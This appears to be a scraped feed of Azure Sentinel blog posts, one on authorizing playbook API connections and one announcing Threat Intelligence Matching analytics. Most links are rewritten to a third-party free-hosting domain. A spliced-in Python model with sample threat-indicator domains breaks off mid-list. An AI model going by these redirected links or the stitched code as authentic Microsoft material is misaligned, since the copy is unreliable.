If we use it with the Azure Sentinel connector, then based on the actions that connector will perform we need to assign the Azure Sentinel Reader, Azure Sentinel Responder, or Azure Sentinel Contributor role.</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture1.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298983iFA78802C742C52EC/image-size/large?v=v2&amp;px=999" role="button" title="Picture1.png" alt="Picture1.png" /></span></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture2.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298984iC12A419FE5D0F1D6/image-size/large?v=v2&amp;px=999" role="button" title="Picture2.png" alt="Picture2.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">It is important to note that </SPAN><STRONG><SPAN data-contrast="auto">managed identity is in preview and is available only to a subset of connectors</SPAN></STRONG><SPAN data-contrast="auto">.</SPAN></P> <P><SPAN data-contrast="auto">Note that there is a hard limit of 2000 role assignments per subscription.</SPAN></P> <P><SPAN data-contrast="auto">Managed identity is the recommended approach to authorize connections for playbooks. 
For more info about the interaction between managed identity and playbooks, check this blog: </SPAN><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-managed-identity-for-azure-sentinel-logic-apps/ba-p/2068204" target="_blank" rel="noopener"><SPAN data-contrast="none">What’s new: Managed Identity for Azure Sentinel Logic Apps connector - Microsoft Tech Community</SPAN></A><SPAN data-contrast="auto">.</SPAN></P> <P>&nbsp;</P> <H3 aria-level="5"><SPAN data-contrast="none">Service principal</SPAN></H3> <P><SPAN data-contrast="auto">A service principal is an identity assigned when you register an application in Azure AD. </SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Click here</SPAN></A><SPAN data-contrast="auto"> to see instructions on how to create an app registration, how to get the Application ID and Tenant ID, and how to generate the secret that you will need to authorize a Logic App connection with a service principal.</SPAN></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture3.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298985iB4346634FD7361E0/image-size/large?v=v2&amp;px=999" role="button" title="Picture3.png" alt="Picture3.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">A service principal needs to have the appropriate permissions to be able to perform a task. In the case of Azure Monitor Logs, for example, we need to have the Log Analytics Reader role-based access control (RBAC) role assigned to the service principal.</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture4.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298989iC642D49B8D1EBE23/image-size/medium?v=v2&amp;px=400" role="button" title="Picture4.png" alt="Picture4.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Once you create a service principal you can use it on multiple playbooks: in our example, we used a service principal for Azure Monitor Logs and we can reuse that connection for each playbook where we have an Azure Monitor Logs connector.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Note: you must manage your service principal’s secret and store it in a secure place (e.g., Key Vault). This adds admin work, since you will need to keep track of your service principal secrets as well as their expiration dates. If the service principal’s secret expires, connections made with that service principal will stop working, which could have an adverse effect on your security operations.</SPAN></P> <P>&nbsp;</P> <H3 aria-level="3"><SPAN data-contrast="none">User account</SPAN></H3> <P><SPAN data-contrast="auto">This is the most straightforward option in terms of identities, because you simply sign in with your own user account or a user account that has the required privileges. To use this, go to the Logic App and select </SPAN><I><SPAN data-contrast="auto">API connections</SPAN></I><SPAN data-contrast="auto">, select the API connection you want to authorize, select </SPAN><I><SPAN data-contrast="auto">Edit API connection</SPAN></I><SPAN data-contrast="auto">, then select </SPAN><I><SPAN data-contrast="auto">Authorize</SPAN></I><SPAN data-contrast="auto"> and </SPAN><I><SPAN data-contrast="auto">Save</SPAN></I><SPAN data-contrast="auto">.</SPAN><SPAN 
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture5.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298993i8AC286AB57CA25CF/image-size/large?v=v2&amp;px=999" role="button" title="Picture5.png" alt="Picture5.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Or&nbsp;you can&nbsp;sign in from&nbsp;the&nbsp;Logic App&nbsp;designer&nbsp;view, as seen in the below screenshot:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture6.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298994iAD00B10FA4F5F5DC/image-size/large?v=v2&amp;px=999" role="button" title="Picture6.png" alt="Picture6.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P>To successfully authorize a connection with a user identity, the user needs to have the appropriate license/permissions assigned to them. 
If we look at the Office 365 Outlook connector, the user needs to have an Exchange Online license assigned. If we want to use a user identity with the Azure Monitor Logs connector, then the user must have the Log Analytics Reader permission assigned to them.</P> <P>&nbsp;</P> <P>Whilst this option is often the most convenient for users, there are downsides to using a user identity:</P> <UL> <LI>It is harder to audit which actions were taken by a user and which were taken by the playbook.</LI> <LI>If a user leaves the organization you need to update all the connections that use that identity to another user account.</LI> <LI>If a user’s permissions or license change (e.g. they no longer use Exchange Online or no longer have the Log Analytics Reader permission) you will need to update these connections to a user identity with the correct licensing/permissions.</LI> </UL> <H2>Connectors</H2> <P><SPAN>Now, let’s have a look at some of the main playbook connectors you will use for Azure Sentinel.</SPAN></P> <P>&nbsp;</P> <H3>Azure Sentinel</H3> <P>The Azure Sentinel connector can be used to trigger a playbook when an incident is created or with a manual trigger on the alert. 
The Azure Sentinel connector relies on the <U>Azure Sentinel REST API</U> and allows you to get incidents, update incidents, update watchlists, etc.</P> <P>&nbsp;</P> <P><SPAN>Connection options:</SPAN></P> <UL> <LI><SPAN>Managed identity (Recommended)</SPAN></LI> <LI><SPAN>Service Principal</SPAN></LI> <LI><SPAN>User identity</SPAN></LI> </UL> <P><SPAN>Other prerequisites: </SPAN></P> <UL> <LI>Azure Sentinel Reader role (if you only want to get information from an incident e.g., Get Entities)</LI> <LI>Azure Sentinel Operator role (if you want to update an incident); or</LI> <LI>Azure Sentinel Contributor role (if you want to make changes on your workspace e.g., update a watchlist).</LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture7.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298995i2F582DC2ACFE4F19/image-size/medium?v=v2&amp;px=400" role="button" title="Picture7.png" alt="Picture7.png" /></span></P> <P>Once you have set up the connection you will notice that a new API connection has been &nbsp;created in the Logic App under API connections:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture8.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298996i934B585E4FBEFAD0/image-size/large?v=v2&amp;px=999" role="button" title="Picture8.png" alt="Picture8.png" /></span></P> <P>&nbsp;</P> <H3 id="h_68003073211627482487828">Microsoft Graph Security</H3> <P>Sometimes you might need to connect to the Graph Security API. For example, you can use the Microsoft Graph Security API to import Threat Intelligence (TI) indicators into Azure Sentinel. 
&nbsp;If you want to add TI indicators to your Threatintelligence table, there is a connector that calls the Graph Security API to do this:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture9.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298997i4B92430B02B0669E/image-size/medium?v=v2&amp;px=400" role="button" title="Picture9.png" alt="Picture9.png" /></span></P> <P>To find out which permissions you need, you should refer to the <SPAN><A href="#" target="_blank" rel="noopener">Graph API documentation</A></SPAN>, and for this specific example refer to <SPAN><A href="#" target="_blank" rel="noopener">tiIndicator: submitTiIndicators - Microsoft Graph beta | Microsoft Docs</A></SPAN>. On the Permissions section, you will see it requires ThreatIndicators.ReadWrite.OwnedBy.</P> <P>&nbsp;</P> <P>Again, here you can connect with your user or with a managed identity:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture10.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298998i5B0D36615ED30A84/image-size/medium?v=v2&amp;px=400" role="button" title="Picture10.png" alt="Picture10.png" /></span></P> <P>&nbsp;</P> <UL> <LI><STRONG>Managed identity</STRONG>: this option is in preview and for now it is not possible to assign the required Graph API permission through the portal. If you want to choose this type of connection, you can assign the permission with PowerShell. If you want to explore this workaround, you can have a look at the personal blog “Rahul Nath” for&nbsp;<A href="#" target="_blank" rel="noopener">instructions</A>. &nbsp;</LI> <LI><STRONG>Signing in with a user</STRONG>: this is the most straightforward option, but there are some downsides as explained earlier in the blog. 
Unless your user is allowed to establish a connection, you will need a Security Administrator or Global Administrator to authorize it. This can be done in Logic Apps under API Connections, and then Edit API connection</LI> </UL> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture11.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298999i70ACDC74061021FF/image-size/medium?v=v2&amp;px=400" role="button" title="Picture11.png" alt="Picture11.png" /></span></P> <P>&nbsp;</P> <H2><SPAN>HTTP connector</SPAN></H2> <P><SPAN>This connector allows you to make a GET, PUT, POST, PATCH or DELETE API call to solutions that are supporting API connections. If you need to get specific information from the solution, and the connector is not available or the</SPAN><SPAN> connector natively doesn’t support that action, while solutions support API calls, we can use an HTTP connector to get that data. </SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture12.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299000i8AB93CB0F787D2B0/image-size/large?v=v2&amp;px=999" role="button" title="Picture12.png" alt="Picture12.png" /></span></P> <P>&nbsp;</P> <P><SPAN>For example, since the Microsoft 365 Defender (M365D) connector does not synchronize comments, we can use an API GET call to ingest comments from M365D and update the Sentinel comment section with those values. 
In terms of permissions, what is required depends on the solution:</SPAN></P> <UL> <LI><STRONG><SPAN>Microsoft Graph API: </SPAN></STRONG><SPAN>to understand the right permissions, please check the <A href="https://gorovian.000webhostapp.com/?exam=#h_68003073211627482487828" target="_self">Microsoft Graph API section</A> in this article:</SPAN> <UL> <LI><STRONG><SPAN>Managed identity</SPAN></STRONG><SPAN>: Please check the Managed identity under the <A href="https://gorovian.000webhostapp.com/?exam=#h_68003073211627482487828" target="_self">Microsoft Graph API section</A></SPAN><SPAN>.</SPAN></LI> <LI><STRONG><SPAN>Active Directory OAuth:</SPAN></STRONG><SPAN> If your endpoint is the Microsoft Graph API, you can find instructions <A href="#" target="_blank" rel="noopener">here</A>. </SPAN></LI> </UL> </LI> <LI><STRONG><SPAN>The </SPAN></STRONG><A href="#" target="_blank" rel="noopener"><STRONG>http://management.azure.com</STRONG></A><STRONG> audience: </STRONG>If your endpoint is part of <A href="#" target="_blank" rel="noopener">http://management.azure.com</A>, you will have to assign the right permissions for the endpoint you want to call. Let’s imagine you want to create a watchlist using REST API <A href="#" target="_blank" rel="noopener">Manage watchlists in Azure Sentinel using REST API | Microsoft Docs</A>. In this case, the endpoint is&nbsp;<A href="#" target="_blank" rel="noopener">https://management.azure.com/subscriptions/{{subscriptionId}}/resourceGroups/{{resourceGroupName}}/providers/Microsoft.OperationalInsights/workspaces/{{workspaceName}}/providers/Microsoft.SecurityInsights/watchlists/{{watchlistAlias}}?api-version={{api-version</A>}}&nbsp;and the permission required would be Azure Sentinel Contributor. Knowing the permission you need will require some basic knowledge of the service. 
<UL> <LI><STRONG><SPAN>Managed identity</SPAN></STRONG><SPAN>: you will assign the right role to the managed identity itself; you can do it from the Access control (IAM) on the resource for which you want to provide permission.</SPAN></LI> <LI><STRONG style="font-family: inherit;">Active Directory OAuth:</STRONG><SPAN style="font-family: inherit;"> in this case, you will assign the permission on the app registration itself.</SPAN></LI> </UL> </LI> </UL> <P>&nbsp;</P> <H3>Key Vault</H3> <P>If you are using a service principal and want to save the secret in a secure place, the best practice is to store them in <SPAN><A href="#" target="_blank" rel="noopener">Key Vault</A></SPAN>. But what if we want to use this secret in our playbook for the HTTP connector explained above? In this scenario we have the Key Vault connector.</P> <P>&nbsp;</P> <P><SPAN>Options for connecting:</SPAN></P> <UL> <LI><SPAN>Managed identity (Recommended)</SPAN></LI> <LI><SPAN>Service Principal</SPAN></LI> <LI><SPAN>User identity</SPAN></LI> </UL> <P><SPAN>Other prerequisites: </SPAN></P> <UL> <LI><SPAN>Managed identity/service principal/user identity authorizing the connection must have assigned </SPAN>permissions to read the secret (Key Vault Secrets User to read; Key Vault Secrets Officer to manage). 
Instructions to assign these permissions can be found by clicking on <SPAN><A href="#" target="_blank" rel="noopener">this link</A></SPAN>.</LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture13.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299002iA48830319C4CEF1B/image-size/medium?v=v2&amp;px=400" role="button" title="Picture13.png" alt="Picture13.png" /></span></P> <P>You can use a Key Vault action to get a secret and use that secret inside of the playbook.</P> <P>One more option with the Key Vault connector also is to turn on Secure Inputs and Secure Outputs features.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture14.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299003i3B43EB8D0ADF5F11/image-size/large?v=v2&amp;px=999" role="button" title="Picture14.png" alt="Picture14.png" /></span></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture15.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299004i9B84033E5408FCBA/image-size/large?v=v2&amp;px=999" role="button" title="Picture15.png" alt="Picture15.png" /></span></P> <P>With this feature on, when the playbook runs a Key Vault action, the input and output content will be hidden by default.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture16.png" style="width: 992px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299005i66F304BFC23EDD97/image-size/large?v=v2&amp;px=999" role="button" title="Picture16.png" alt="Picture16.png" /></span></P> <P>&nbsp;</P> <H3>Azure Monitor Logs</H3> <P>You will need to use the Azure Monitor Logs connector when you want to run a query against the data in your Azure Sentinel workspace from a Logic App. 
This can be used when we want to get more data about incident/alert entities before we decide what kind of action we will take. For example, we have a Watchlist with VIP users, and we want to cross-reference it with Accounts in the incident/alert. If the Account in the incident/alert is also in the Watchlist, then we will change the severity of the incident to High.</P> <P>&nbsp;</P> <P><SPAN>Options for connecting:</SPAN></P> <UL> <LI><SPAN>Service principal (recommended)</SPAN></LI> <LI><SPAN>User identity</SPAN></LI> </UL> <P><SPAN>Other prerequisites: </SPAN></P> <UL> <LI><SPAN>Service principal/user identity authorizing connection must have the </SPAN>Log Analytics Reader role assigned</LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture17.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299007iC1ED8480F9DC4E8D/image-size/medium?v=v2&amp;px=400" role="button" title="Picture17.png" alt="Picture17.png" /></span></P> <P>Here is the query in the Azure Monitor Logs Logic App connector:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture18.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299008iDB19BC2282EC15A6/image-size/large?v=v2&amp;px=999" role="button" title="Picture18.png" alt="Picture18.png" /></span></P> <P>&nbsp;</P> <H3>Office 365 Outlook</H3> <P>Whenever you want to send an email notification, send an email approval, flag an email, forward an email etc., you can use the Office 365 Outlook connector.</P> <P>&nbsp;</P> <P><SPAN>Options for connecting:</SPAN></P> <UL> <LI><SPAN>User identity</SPAN></LI> </UL> <P><SPAN>Other prerequisites: </SPAN></P> <UL> <LI><SPAN>User authorizing connection must have an Exchange Online license assigned</SPAN></LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture19.png" 
style="width: 567px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299009iE2927AD5A50338AF/image-size/large?v=v2&amp;px=999" role="button" title="Picture19.png" alt="Picture19.png" /></span></P> <P>&nbsp;</P> <P>There are different options to configure when using this connector, e.g. adding people to CC or BCC, adding an attachment, configuring the email address to use when replying, or changing the importance of the email.</P> <P>&nbsp;</P> <P>An important part of this connector to understand is the “From (Send As)” parameter. This is important because when you authorize a connection with the user identity, all emails will be sent from that account.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture20.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299011iF86E2C38049B1391/image-size/large?v=v2&amp;px=999" role="button" title="Picture20.png" alt="Picture20.png" /></span></P> <P>&nbsp;</P> <P>The “From (Send As)” parameter gives us the option to change the sender of that email to a Microsoft 365 Group, a shared mailbox or some other user. 
Note that a valid Send As configuration must be applied to the mailbox so that it can send emails successfully.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture21.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299016i0081853E9AF76278/image-size/large?v=v2&amp;px=999" role="button" title="Picture21.png" alt="Picture21.png" /></span></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture22.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299017iAB412296CBC58724/image-size/large?v=v2&amp;px=999" role="button" title="Picture22.png" alt="Picture22.png" /></span></P> <P>&nbsp;</P> <P>Another option is to have one specific user account, like <A href="https://gorovian.000webhostapp.com/?exam=mailto:soc@xyz.com" target="_blank" rel="noopener">soc@xyz.com</A>, which you will use to authorize Office 365 Outlook connection and all emails will appear as if they are sent from <A href="https://gorovian.000webhostapp.com/?exam=mailto:soc@xyz.com" target="_blank" rel="noopener">soc@xyz.com</A>. 
Please note that the account used for this must be a user account (not a Microsoft 365 Group or shared mailbox), and it must have a valid Exchange Online license/mailbox.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture23.png" style="width: 799px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299018iCCB332254BF39F32/image-size/large?v=v2&amp;px=999" role="button" title="Picture23.png" alt="Picture23.png" /></span></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture25.png" style="width: 567px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299019i1B36733965A3752F/image-size/large?v=v2&amp;px=999" role="button" title="Picture25.png" alt="Picture25.png" /></span></P> <P>&nbsp;</P> <H3>Microsoft Teams</H3> <P><SPAN>Microsoft Teams is another popular connector that can be used for sending notifications. As</SPAN><SPAN> Microsoft Teams plays a big role in organizing teams and providing a place to centralize collections of information, and has become even more critical since the pandemic, it’s a useful tool to integrate into your SOC operations and automation</SPAN><SPAN>. 
</SPAN></P> <P><SPAN>&nbsp;</SPAN></P> <P><SPAN>Options for connecting:</SPAN></P> <UL> <LI><SPAN>User identity</SPAN></LI> </UL> <P><SPAN>Other prerequisites: </SPAN></P> <UL> <LI><SPAN>User authorizing connection must have a Microsoft Teams license assigned, and</SPAN></LI> <LI>Specific permissions (to post a message to a channel, the user must be a member of that team; to add a member – must be owner; to create a new team group – must have permission to create a Microsoft 365 Group…)</LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture26.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299020i1E2008FBFF45B6FC/image-size/medium?v=v2&amp;px=400" role="button" title="Picture26.png" alt="Picture26.png" /></span></P> <P><SPAN>&nbsp;</SPAN></P> <P>Note that when a user authorizes a connection, all actions will appear as they are performed by that specific user. (Unlike with Office 365 Outlook where we have the “From (Send As)” parameter, that is not an option in Microsoft Teams.)</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture27.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299021i233A05079AC8A149/image-size/large?v=v2&amp;px=999" role="button" title="Picture27.png" alt="Picture27.png" /></span></P> <P>&nbsp;</P> <P>As mentioned with Office 365 Outlook connection, we can have one specific user account, like <SPAN><A href="https://gorovian.000webhostapp.com/?exam=mailto:soc@xyz.com" target="_blank" rel="noopener">soc@xyz.com</A></SPAN>, which you will use to authorize Microsoft Teams connection and all actions will appear as if they have been initiated by <SPAN><A href="https://gorovian.000webhostapp.com/?exam=mailto:soc@xyz.com" target="_blank" rel="noopener">soc@xyz.com</A></SPAN>.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" 
image-alt="Picture28.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299022iA8E0A7C730A36AB2/image-size/large?v=v2&amp;px=999" role="button" title="Picture28.png" alt="Picture28.png" /></span></P> <P>&nbsp;</P> <P><SPAN>Thanks to our reviewers&nbsp;<A href="https://gorovian.000webhostapp.com/?exam=t5/user/viewprofilepage/user-id/215052" target="_blank" rel="noopener">@Jeremy Tan</A>&nbsp;,&nbsp;<LI-USER uid="94294"></LI-USER>&nbsp;and&nbsp;<LI-USER uid="66621"></LI-USER>&nbsp;.</SPAN></P> <P>&nbsp;</P> <P><SPAN>We hope you found this article useful, please leave us your feedback and questions in the comments section.</SPAN></P> <P>&nbsp;</P> Thu, 29 Jul 2021 17:28:14 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/understanding-api-connections-for-your-azure-sentinel-playbooks/ba-p/2593973 madesous 2021-07-29T17:28:14Z Microsoft Threat Intelligence Matching Analytics https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/microsoft-threat-intelligence-matching-analytics/ba-p/2525605 <P><FONT size="5"><STRONG>Introduction</STRONG></FONT></P> <P><FONT size="4">Azure Sentinel is a cloud native SIEM solution that allows various ways to bring your own threat intelligence data (BYOTI) like STIX/TAXII and from various Threat Intelligence Platforms.</FONT></P> <P><FONT size="4">Apart from bringing in your own threat intelligence data, you can also reference threat intelligence data produced by Microsoft for detection and analysis.</FONT></P> <P><FONT size="4">Today we are announcing launch of a new analytic rule called Microsoft Threat Intelligence Matching analytics that matches Microsoft generated threat intelligence data with your logs and generates high fidelity alerts/incidents with appropriate severity based on the context of the log. 
Once a match is generated, the indicator is published to your threat intelligence repository in Azure Sentinel.</FONT></P> <P>&nbsp;</P> <P><FONT size="4">In this blog, we will cover:</FONT></P> <OL> <LI><FONT size="4">Details and working of the Microsoft Threat Intelligence Matching analytics</FONT></LI> <LI><FONT size="4">How to enable Microsoft Threat Intelligence Matching analytics</FONT></LI> <LI><FONT size="4">Log sources and threat intelligence types used for matching by this rule</FONT></LI> <LI><FONT size="4">Alert grouping for incident generation and searching IOC’s published by this rule</FONT></LI> </OL> <P>&nbsp;</P> <P><FONT size="5"><STRONG>Details and working of the Microsoft Threat Intelligence Matching analytics</STRONG></FONT></P> <P><FONT size="4">Microsoft Threat Intelligence matching analytics is an out of the box analytic rule offered to all Azure Sentinel customers. This rule matches your log data with <STRONG>Microsoft generated </STRONG>threat intelligence. Microsoft has a vast repository of threat intelligence data, and this analytic rule uses a subset of this threat intelligence data to generate high fidelity alerts and incidents for SOC teams to triage.</FONT></P> <P><FONT size="4">Currently, this rule matches <STRONG>domain</STRONG> indicators against the following log sources:</FONT></P> <OL> <LI><FONT size="4">Common Security Logs (CEF)</FONT></LI> <LI><FONT size="4">DNS logs</FONT></LI> <LI><FONT size="4">Syslog</FONT></LI> </OL> <P><FONT size="5"><STRONG>How to enable Microsoft Threat Intelligence Matching analytics</STRONG></FONT></P> <P><FONT size="4">Microsoft Threat Intelligence matching analytics can be discovered in the Analytic menu of Azure Sentinel.</FONT></P> <P><FONT size="4">Follow the below steps to enable this rule:</FONT></P> <OL> <LI><FONT size="4">Open the&nbsp;<A href="#" target="_blank" rel="noopener">Azure portal</A>&nbsp;and navigate to the&nbsp;<STRONG>Azure Sentinel</STRONG>&nbsp;service.</FONT></LI> 
<LI><FONT size="4">Choose the&nbsp;<STRONG>workspace</STRONG>&nbsp;in which you would like to enable this rule.</FONT></LI> <LI><FONT size="4">Select&nbsp;<STRONG>Analytics</STRONG>&nbsp;from the menu and search for “Microsoft Threat Intelligence Analytics” in the <STRONG>Rule Templates</STRONG> tab.</FONT></LI> <LI><FONT size="4">Click the <STRONG>Create Rule </STRONG>button and set the status of the rule to <STRONG>Enabled</STRONG>.</FONT></LI> <LI><FONT size="4">Click the Next button and review all the details. Click Save.</FONT></LI> <LI><FONT size="4">Now the rule is enabled and will show up in the <STRONG>Active Rules</STRONG> tab.</FONT></LI> </OL> <P><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Image 1.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/294164i39D42DAB8A563B28/image-size/large?v=v2&amp;px=999" role="button" title="Image 1.png" alt="Image 1.png" /></span></FONT></P> <P>&nbsp;</P> <P><FONT size="5"><STRONG>Log sources and threat intelligence types used for matching by this rule</STRONG></FONT></P> <P><FONT size="4">The Threat Intelligence Matching analytic rule matches Microsoft threat intelligence with your log data. Currently, the following types of logs are available for matching:</FONT></P> <P><FONT size="4"><STRONG>1. 
Common Security Logs (CEF):</STRONG></FONT></P> <UL> <LI><FONT size="4">Matching is done for all CEF logs that are ingested in the <EM>CommonSecurityLog </EM>table of Log Analytics, except for those that have DeviceVendor set to “Cisco”.</FONT></LI> <LI><FONT size="4">To match Microsoft generated threat intelligence with CEF logs, please have the domain mapped in the “RequestURL” field of the CEF log.</FONT></LI> </UL> <P><FONT size="4"><STRONG>2.&nbsp;</STRONG><STRONG>DNS logs</STRONG></FONT></P> <UL> <LI><FONT size="4">Matching is done for all DNS logs which are lookup DNS queries from clients to DNS services (SubType == "LookupQuery"). Threat Intelligence matching analytics only processes DNS queries for IPv4 (QueryType=”A”) and IPv6 (QueryType=”AAAA”).</FONT></LI> <LI><FONT size="4">To match Microsoft generated threat intelligence with DNS logs, no manual mapping of columns is needed. All columns are standard from Windows DNS Server. The domains will be in the “Name” column by standard.</FONT></LI> </UL> <P><FONT size="4"><STRONG>3. Syslog</STRONG></FONT></P> <UL> <LI><FONT size="4">Matching is done for Syslog events with Facility set to “cron”. This will be extended to additional log types in the future.</FONT></LI> <LI><FONT size="4">To match Microsoft generated threat intelligence with Syslog, no manual mapping of columns is needed, as the details come in the “SyslogMessage” field of the Syslog by default. The rule will parse the domain from the SyslogMessage.</FONT></LI> </UL> <P><FONT size="5"><STRONG>Alert grouping for incident generation and searching IOC’s published by this rule</STRONG></FONT></P> <P><FONT size="4">The Microsoft Threat Intelligence matching analytic generates an alert every time a match is received. The rule performs alert grouping while generating incidents. The alerts are grouped on a per-observable basis over a 24-hour timeframe. 
For example, all alerts generated in a 24-hour duration for a match with domain “abc.com” will be grouped in a single incident.</FONT></P> <P><FONT size="4">To triage through incidents generated by this analytic rule, you can follow the below steps:</FONT></P> <OL> <LI><FONT size="4">Open the&nbsp;<A href="#" target="_blank" rel="noopener">Azure portal</A>&nbsp;and navigate to the&nbsp;<STRONG>Azure Sentinel</STRONG>&nbsp;service.</FONT></LI> <LI><FONT size="4">Choose the&nbsp;<STRONG>workspace</STRONG>&nbsp;in which you have enabled this rule.</FONT></LI> <LI><FONT size="4">Select&nbsp;<STRONG>Incidents</STRONG>&nbsp;from the menu and search for “Microsoft Threat Intelligence Analytics”.</FONT></LI> <LI><FONT size="4">If there are any incidents, they will show up in the grid of incidents.</FONT></LI> <LI><FONT size="4">Click on the <STRONG>View full details </STRONG>button to view entities and other details about the incident, such as alerts.</FONT></LI> </OL> <P><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Image 2.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/294165i206CADAC84F73CD6/image-size/large?v=v2&amp;px=999" role="button" title="Image 2.png" alt="Image 2.png" /></span></FONT></P> <P><FONT size="4">Once a match is received, the indicator is also published to the <EM>ThreatIntelligenceIndicators</EM> table of Log Analytics and shows up in the Threat Intelligence menu. 
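The matching scope, the per-observable 24-hour grouping and the Source stamp described in this section, as an added Python model that is not Microsoft's rule code: the indicator set and the CEF, DNS and Syslog rows are constructed sample data, and the column names used for the three tables and for the published indicator rows are simplified assumptions made for the example, not the product's schema.

```python
"""Offline model of the Threat Intelligence Matching behaviour described above.

Added example, not Microsoft's rule code. The indicator set, the log rows and
the table column names are constructed assumptions for illustration only.
"""
from datetime import datetime, timedelta
import re
from urllib.parse import urlsplit

# Constructed stand-in for the Microsoft-generated domain indicators.
TI_DOMAINS = {"abc.com", "evil.example"}

# Constructed rows shaped like the three tables the rule reads (simplified columns).
COMMON_SECURITY_LOG = [
    {"TimeGenerated": "2021-07-28T01:00:00Z", "DeviceVendor": "Palo Alto Networks",
     "RequestURL": "http://abc.com/login"},
    {"TimeGenerated": "2021-07-28T02:00:00Z", "DeviceVendor": "Cisco",
     "RequestURL": "http://abc.com/x"},            # DeviceVendor "Cisco" is excluded
    {"TimeGenerated": "2021-07-28T03:00:00Z", "DeviceVendor": "Fortinet",
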